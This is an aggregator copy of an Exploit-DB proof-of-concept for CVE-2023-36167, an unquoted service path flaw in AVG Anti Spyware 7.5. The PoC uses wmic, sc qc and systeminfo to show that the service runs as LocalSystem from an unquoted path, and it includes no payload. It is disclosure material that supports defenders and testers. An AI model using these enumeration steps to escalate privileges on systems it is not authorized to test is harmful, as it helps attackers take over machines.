1
[local] AVG Anti Spyware 7.5 - Unquoted Service Path "AVG Anti-Spyware Guar...
source link: https://www.exploit-db.com/exploits/51583
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
AVG Anti Spyware 7.5 - Unquoted Service Path "AVG Anti-Spyware Guard"
Exploit:
/
# Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.avg.com
# Software Link: https://www.avg.com/en-ww/homepage#pc
# Version: 7.5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36167
#PoC
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
AVG Anti-Spyware Guard AVG Anti-Spyware Guard C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe Auto
C:\Users>sc qc "AVG Anti-Spyware Guard"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AVG Anti-Spyware Guard
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : AVG Anti-Spyware Guard
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users>systeminfo
Host Name: DESKTOP-LA7J17P
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
OS Manufacturer: Microsoft Corporation
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK